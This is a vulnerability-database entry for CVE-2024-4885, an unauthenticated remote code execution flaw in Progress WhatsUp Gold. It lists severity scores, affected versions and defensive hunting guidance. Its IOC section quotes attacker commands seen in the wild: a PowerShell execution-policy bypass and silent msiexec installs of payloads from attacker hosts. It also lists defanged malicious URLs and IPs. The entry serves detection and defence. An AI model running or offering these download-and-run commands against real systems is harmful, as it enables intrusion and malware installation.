cbcvebase.
CVE-2024-4885
published 2024-06-25

CVE-2024-4885: In WhatsUp Gold versions released before 2023.1.3, an unauthenticated Remote Code Execution vulnerability in Progress WhatsUpGold. The…

PriorityP1100critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-03-24
Exploited in the wild
EPSS
99.29%
99.9th percentile
In WhatsUp Gold versions released before 2023.1.3, an unauthenticated Remote Code Execution vulnerability in Progress WhatsUpGold. The WhatsUp.ExportUtilities.Export.GetFileWithoutZip allows execution of commands with iisapppool\nmconsole privileges.

Affected

2 ranges
VendorProductVersion rangeFixed in
progresswhatsup_gold< 23.1.323.1.3
progress_software_corporationwhatsup_gold>= 2023.1.0 < 2023.1.32023.1.3

Detection & IOCsextracted from sources · hover to see the quote

urlhxxps://webhook[.]site/b6ef7410-9ec8-44f7-8cdf-7890c1cf5837
ip45.227.255[.]216
urlhxxp://45.227.255[.]216:29742/ddQCz2CkW8/setup.msi
domainfedko[.]org
urlhxxps://fedko[.]org/wp-includes/ID3/setup.msi
ip185.123.100[.]160
urlhxxp://185.123.100[.]160/access/Remote Access-windows64-offline.exe
pathc:\programdata\a.ps1
pathC:\programdata\ftpd32.exe
pathc:\windows\temp\MSsetup.msi
port29742
processNmPoller.exe
commandpowershell -exec bypass -file c:\programdata\a.ps1
commandmsiexec /i hxxps://fedko[.]org/wp-includes/ID3/setup.msi /Qn
commandmsiexec /i hxxp://45.227.255[.]216:29742/ddQCz2CkW8/setup.msi /Qn
  • Use the following Trend Vision One / Endpoint Activity Data query to hunt for suspicious NmPoller.exe activity: "nmpoller.exe" AND eventSubId:(2 OR 101 OR 109 OR 901)
  • The vulnerable endpoint is WhatsUp.ExportUtilities.Export.GetFileWithoutZip, which allows unauthenticated RCE with iisapppool\nmconsole privileges. Look for unauthenticated HTTP requests targeting this endpoint.
  • Exploitation of CVE-2024-4885 in the wild was first observed December 6, 2024, with 8 unique malicious IPs observed through March 2, 2025, predominantly sourced from Hong Kong, Russia, and Brazil.
  • ·The IOCs (URLs, IPs, dropped files) observed in the wild are primarily associated with CVE-2024-6670/6671 exploitation campaigns, not CVE-2024-4885 directly. The sources reference CVE-2024-4885 as a related WhatsUp Gold RCE vulnerability (CVSS 9.8, fixed June 2024) that attracted attacker attention, but the detailed payload IOCs are from the August 2024 CVE-2024-6670/6671 campaign. Defenders should treat these IOCs as indicative of the broader WhatsUp Gold attack ecosystem.
  • ·CVE-2024-4885 affects WhatsUp Gold versions released before 2023.1.3. Exploitation executes with iisapppool\nmconsole privileges, not SYSTEM-level, which may affect lateral movement capability assessments.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.